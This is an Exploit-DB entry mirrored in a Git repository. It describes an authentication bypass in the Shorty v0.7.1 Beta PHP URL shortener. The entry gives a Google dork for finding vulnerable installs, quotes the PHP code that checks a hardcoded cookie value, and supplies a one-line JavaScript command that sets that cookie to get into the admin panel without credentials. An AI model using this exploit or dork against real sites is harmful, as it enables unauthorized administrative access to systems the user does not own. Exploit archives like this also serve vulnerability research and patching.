bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/9419.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

42 lines
No EOL
1.1 KiB
Text
Raw Blame History

Vulnerable Software
--------------------------------------------------------------------------------
Script: Shorty v0.7.1 Beta (maybe other versions)
URL:http://get-shorty.com/
Download:http://get-shorty.com/beta?force=download
Google dork: intitle:"Shorty (Beta)"
Bug
--------------------------------------------------------------------------------
[functions.php]
45: function authenticate(){
46: $cookie = @$_COOKIE['snickerdoodle'];
47: if($cookie == "polarbears"){
48: //
49: } else {
50: exit("Not logged in.");
51: }
52: }
53:
54: function verify(){
55: if(@$_COOKIE['snickerdoodle']){
56: $cookie = $_COOKIE['snickerdoodle'];
57: } else {
58: $cookie = '';
59: }
60: if($cookie == "polarbears"){
61: return 1;
62: } else {
63: return 0;
64: }
65: }
[/functions.php]
Exploit
--------------------------------------------------------------------------------
Write in the URL: javascript:document.cookie="snickerdoodle=polarbears"; in
the admin login you want to bypass or create the cookie with you favorite
Firefox extension.
# milw0rm.com [2009-08-12]
Reference in a new issue View git blame Copy permalink